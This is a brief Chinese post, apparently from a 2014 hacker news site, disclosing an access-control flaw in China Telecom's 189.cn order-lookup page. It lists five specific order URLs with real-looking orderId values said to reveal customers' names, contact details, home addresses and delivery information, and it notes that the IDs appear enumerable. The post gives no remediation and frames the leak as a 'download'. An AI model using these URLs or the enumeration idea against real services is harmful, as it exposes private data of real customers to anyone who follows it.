中国电信订单泄露(涉及用户各项隐私信息)下载

来源:黑吧安全网 浏览:1046次 时间:2014-04-28
做网站找雨过天晴工作室

用户姓名,联系方式,家庭住址,物流情况,产品信息都有......

1.http://www.189.cn/dqmh/virtualStation/virtualMyOrderInfo.do?method=myOrderInfo&orderId=000000000000008320130624401048



2.http://www.189.cn/dqmh/virtualStation/virtualMyOrderInfo.do?method=myOrderInfo&orderId=000000000000008320130626485753&forderid=000000000000008320130626485753



3.http://www.189.cn/dqmh/virtualStation/virtualMyOrderInfo.do?method=myOrderInfo&orderId=000000000000008320130624405756



4.http://www.189.cn/dqmh/virtualStation/virtualMyOrderInfo.do?method=myOrderInfo&orderId=600104833000008320130619256383



5.http://www.189.cn/dqmh/virtualStation/virtualMyOrderInfo.do?method=myOrderInfo&orderId=600104833100008320130620282945



等等......

orderID值没有控制好,目测这些orderID,应该是可以遍历的

堵漏方法:电信的大牛你们比我更懂